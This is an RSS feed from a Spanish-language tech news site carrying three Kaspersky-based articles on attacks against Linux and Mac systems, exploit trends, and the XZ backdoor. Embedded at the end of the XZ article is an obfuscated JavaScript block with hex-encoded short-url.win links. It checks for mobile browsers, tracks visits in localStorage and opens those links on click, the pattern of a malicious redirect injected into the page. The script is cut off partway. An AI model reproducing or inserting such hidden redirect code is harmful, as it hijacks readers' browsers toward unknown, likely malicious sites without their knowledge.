<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>linux &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Fri, 12 Dec 2025 12:17:26 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>Más de 726 mil ciberataques a sistemas Linux y más de 431 mil a Mac en Latam</title>
		<link>https://www.todoenunclick.com/mas-de-726-mil-ciberataques-a-sistemas-linux-y-mas-de-431-mil-a-mac-en-latam/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Thu, 11 Dec 2025 16:27:00 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Appel]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[LATAM]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Sistemas]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101455</guid>

					<description><![CDATA[<p><img width="2560" height="1709" src="https://www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=1536%2C1025&amp;ssl=1 1536w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=2048%2C1367&amp;ssl=1 2048w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=681%2C455&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="(max-width: 2560px) 100vw, 2560px" /></p><!-- wp:paragraph -->
<p><strong>Kaspersky advierte un aumento constante de ataques contra sistemas usados en trabajo, servidores y dispositivos personales.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>América Latina se ha consolidado como una de las regiones más impactadas por los ciberataques dirigidos a sistemas Linux y Mac, según el Panorama de Amenazas de Kaspersky. Entre agosto de 2024 y julio de 2025, se registraron 726 mil ataques bloqueados en sistemas Linux, lo que representa un promedio de 2 mil ataques diarios en la región.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En el caso de los computadores de Apple con sistema Mac, se contabilizaron 431.811 ataques, con un promedio de 1.183 intentos de ataque por día. A continuación, se detallan los países más afectados, los tipos de amenazas más frecuentes y recomendaciones para mantenerse protegido.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre el periodo mencionado, <strong>Argentina</strong> registró 32 mil&nbsp; ataques bloqueados en sistemas Linux. En cuanto a los sistemas Mac, se detectaron 9600 intentos de ataque, lo que refleja el interés creciente de los ciberdelincuentes en este tipo de dispositivos en el país.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre los países más impactados por ataques a sistemas Linux en la región se encuentran Brasil (385 mil), Chile (116 mil), México (100 mil), Colombia (67 mil) y Perú (42 mil). Por su parte, los ataques dirigidos a sistemas Mac afectaron principalmente a Brasil (180 mil), México (84 mil), Ecuador (35 mil), Colombia (33 mil) y Perú (33 mil).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Fabio Assolini, director del Equipo Global de Investigación y Análisis de Kaspersky para América Latina, explica:</strong> <em>“Antes se creía que estos sistemas eran inherentemente más seguros, pero esa premisa ya no se sostiene frente a la sofisticación de los atacantes. El alto uso de Linux en infraestructuras críticas, servidores y dispositivos IoT lo convierte en un objetivo clave. De igual forma, la creciente popularidad de los computadores Apple con sistema Mac atrae la atención de los ciberdelincuentes”.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Es fundamental que empresas, organismos públicos y usuarios adopten una postura proactiva en materia de seguridad. La protección no es opcional, sino una necesidad constante. Mantener los sistemas actualizados, utilizar soluciones confiables y emplear contraseñas seguras siguen siendo medidas básicas pero esenciales</em>”, <strong>concluye Assolini.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky ofrece algunos consejos sencillos para proteger sus sistemas:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Mantenga las actualizaciones más recientes:</strong> Instale siempre las actualizaciones de su sistema operativo (Linux, Mac) y de los programas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Contraseñas fuertes y únicas:</strong> Evite contraseñas débiles y fáciles de adivinar. Use contraseñas complejas y no repita la misma contraseña en varios lugares. Los <a href="https://latam.kaspersky.com/password-manager">gestores de contraseñas</a> pueden ayudar.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Use un firewall:</strong> Es una barrera que impide accesos no autorizados a su computadora.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilice una solución de seguridad integral:</strong> Elija una <a href="https://latam.kaspersky.com/premium">solución de seguridad confiable</a> que ofrezca protección contra malware, exploits y otras amenazas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Monitoree los registros del sistema:</strong> Revise los registros automáticos de las actividades del equipo para identificar comportamientos sospechosos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Aprenda sobre seguridad:</strong> Infórmese sobre las nuevas amenazas y cómo protegerse.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/mas-de-726-mil-ciberataques-a-sistemas-linux-y-mas-de-431-mil-a-mac-en-latam/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101455</post-id>	</item>
		<item>
		<title>Ciberataques al alza: exploits contra Windows y Linux ponen en jaque a empresas</title>
		<link>https://www.todoenunclick.com/ciberataques-al-alza-exploits-contra-windows-y-linux-ponen-en-jaque-a-empresas/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Tue, 02 Sep 2025 22:08:51 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ciberataques]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[vulnerabilidades]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101032</guid>

					<description><![CDATA[<p><img width="2560" height="1709" src="https://www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=1536%2C1025&amp;ssl=1 1536w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=2048%2C1367&amp;ssl=1 2048w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?resize=681%2C455&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/09/exploits-linux-windows-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="(max-width: 2560px) 100vw, 2560px" /></p><!-- wp:paragraph -->
<p>El panorama de ciberamenazas se intensifica en 2025: cada vez más empresas enfrentan exploits dirigidos a usuarios de Windows y Linux.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Nuevos datos de Kaspersky revelan que el volumen de vulnerabilidades reportadas por cve.org alcanzó niveles más altos que en años anteriores, impulsando el uso de exploits como herramienta clave para el acceso no autorizado a sistemas corporativos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Un exploit es un tipo de malware diseñado para aprovechar un error o vulnerabilidad existente en una aplicación o sistema operativo con el fin de obtener acceso no autorizado a los sistemas. El reciente <a href="https://securelist.com/vulnerabilities-and-exploits-in-q2-2025/117333/">Informe de Kaspersky Exploits y Vulnerabilidades en el Segundo Trimestre de 2025</a> muestra que la proporción de exploits dirigidos a vulnerabilidades críticas en sistemas operativos alcanzó el 64% en el segundo trimestre de 2025 (frente al 48% en el primer trimestre de 2025), seguidos de aplicaciones de terceros (29%) y navegadores (7%).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El número de usuarios de Linux que se enfrentaron a exploits muestra una tendencia al alza en 2025 en comparación con 2024. En concreto, en el segundo trimestre de 2025 la cifra fue más de 50 puntos superior a la del segundo trimestre de 2024, y en el primer trimestre de 2025 fue casi el doble respecto al mismo periodo de 2024.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101033,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/09/image.gif" alt="" class="wp-image-101033" /><figcaption class="wp-element-caption"><em>Número de usuarios protegidos por Kaspersky que enfrentaron vlnerabilidades por exploits en 2024-2025</em></figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>El número de usuarios de Windows que se encontraron con exploits también mostró una tendencia al alza en el primer y segundo trimestre de 2025: hubo un crecimiento de 25 puntos en el primer trimestre de 2025 en comparación con el mismo periodo de 2024, y un crecimiento de 8 puntos en el segundo trimestre de 2025 frente al segundo trimestre de 2024.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre las vulnerabilidades utilizadas en ataques avanzados (Advanced Persistent Threat, APT) se encuentran tanto 0-days recientes como vulnerabilidades ya conocidas y parcheadas recientemente. En la mayoría de los casos, se trata de herramientas para acceder al sistema y escalar privilegios. Información más detallada está disponible en el informe publicado en Securelist.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>Los atacantes utilizan cada vez más métodos para escalar privilegios y aprovechar debilidades en los sistemas digitales. A medida que crece el número de vulnerabilidades, resulta muy importante dar prioridad constante a la corrección de vulnerabilidades conocidas y utilizar software que pueda mitigar las acciones posteriores a la explotación. Los CISOs deben contrarrestar las consecuencias de la explotación buscando y neutralizando implantes de comando y control que los atacantes pueden aprovechar en un sistema comprometido”,</em> <strong>advierte</strong> <strong>Fabio Assolini, director del equipo de Global de Investigación y Análisis para América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De acuerdo con cve.org, tanto el número de vulnerabilidades críticas como el total de CVE registrados (Common Vulnerabilities and Exposures por sius siglas en inglés) se dispararon en la primera mitad de 2025. A inicios de 2024 había alrededor de 2,600 CVE registrados mensualmente, una cifra que fue aumentando a lo largo del año. En comparación, en 2025 ya se registran más de 4,000 CVE al mes.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101034,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/09/image-1.gif" alt="" class="wp-image-101034" /><figcaption class="wp-element-caption"><em>Nuevos CVE con la cuota de vulnerabilidades críticas, 2019-2024. Fuente: cve.org</em></figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Para que las organizaciones puedan protegerse en este panorama de amenazas en constante cambio, Kaspersky recomienda:&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Investigar los exploits de vulnerabilidades únicamente dentro de entornos virtuales seguros o controlados, para evitr así riesgos en los sistemas reales de las empresas y comprender cómo operan estas amenazas antes de que puedan ser utilizadas por atacantes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Garantizar la supervisión 24/7 de la infraestructura, con especial atención a las defensas perimetralespara detectar de inmediato accesos sospechosos o intentos de intrusión antes de que se comprometan los sistemas críticos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Asegurarse de que la gestión de parches o las medidas de compensación para aplicaciones de cara al público tengan tolerancia cero. Para la seguridad de la infraestructura de una empresa es crucial aplicar las actualizaciones de las vulnerabilidades que emiten los proveedores de software, así como analizar la red en busca de vulnerabilidades e instalar parches.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Implementar <a href="https://latam.kaspersky.com/next">soluciones confiables</a> para detectar y bloquear software malicioso en los dispositivos corporativos, complementadas con herramientas integrales que incluyan escenarios de respuesta a incidentes, programas de capacitación para empleados y una base de datos de ciberamenazas actualizada.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/ciberataques-al-alza-exploits-contra-windows-y-linux-ponen-en-jaque-a-empresas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101032</post-id>	</item>
		<item>
		<title>Descubierto backdoor en linux: ¿Tu empresa está en riesgo?</title>
		<link>https://www.todoenunclick.com/descubierto-backdoor-en-linux-tu-empresa-esta-en-riesgo/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 26 Apr 2024 16:27:04 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataque]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[cadena de suministro]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[vulnerabilidad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98747</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Descubierto backdoor en linux: ¿Tu empresa está en riesgo?" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/04/1687018127_en-idei-club-p-matrix-computer-dizain-35.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>A finales de marzo, se descubrió la implantación de un <em>backdoor </em>(puerta trasera) en XZ, el conjunto de herramientas de compresión de datos integrada en muchas distribuciones populares de Linux. El análisis inicial reveló que es extremadamente sofisticada en términos de ejecución, evasión (proceso que evita su detección por parte de las soluciones de seguridad) e impacto (potenciales pérdidas para las organizaciones) en servidores SSH. Dado que las utilidades&nbsp;<em>troyanizadas</em>&nbsp;de Linux lograron abrirse camino en varias versiones populares que se lanzaron en marzo, esta vulnerabilidad (CVE-2024-3094) podría considerarse como un grave ataque a la cadena de suministro.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El ataque inició al comprometer la biblioteca de la herramienta XZ, la cual incluye archivos para probar el código de compresión y descompresión de datos para asegurarse de que este funciona. Los especialistas de Kaspersky explican que los atacantes se dieron cuenta de esto y agregaron dos archivos de prueba que ocultan el código para implantar un <em>backdoor</em>, permitiendo a los invasores controlar las máquinas en las que esta biblioteca esté instalada. También es posible utilizar este <em>backdoor </em>para otros tipos de ataques, dependiendo de la intención de los criminales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según expertos de Kaspersky, la vulnerabilidad CVE-2024-3094 podría haberse convertido en el ataque a mayor escala al ecosistema Linux de la historia, ya que estaba principalmente dirigido a servidores SSH, la principal herramienta de gestión remota de todos los servidores de Linux en internet. Afortunadamente, fue detectada en las distribuciones en situación de prueba y en desarrollo, donde se utilizaron los últimos paquetes de software, lo que mantuvo a salvo a un gran número de usuarios de Linux.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>"La implementación del backdoor se realizó de manera muy sigilosa, lo que dificultó su identificación por parte de la comunidad de software de código abierto (OSS). Los códigos del backdoor también son altamente complejos. La manera en que la infección utiliza códigos legítimos para tareas maliciosas también es muy inteligente y demuestra la familiaridad del invasor (desarrollador) con el sistema operativo objetivo. Nuestra experiencia en amenazas de Linux fue esencial para comprender rápidamente cómo ocurre la infección</em>", afirma <strong>Anderson Leite, investigador de seguridad de Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Tras su detección y análisis, los expertos de Kaspersky aseguran que los clientes de la empresa no se verán afectados por esta vulnerabilidad. Las tecnologías de la empresa detectan esta amenaza con el nombre HEUR:Trojan.Script.XZ.a y Trojan.Shell.Xz.a. Además, la solución de protección de la empresa para Linux también detecta el proceso malicioso SSHD en la memoria como MEM:Trojan.Linux.XZ.a (como parte del escaneo de áreas críticas).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Información adicional está disponible en el blog técnico <a href="https://securelist.lat/xz-backdoor-story-part-1/98635/">Securelist</a> o en los informes de <a href="https://latam.kaspersky.com/enterprise-security/threat-intelligence">Threat Intelligence</a> de la empresa.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return 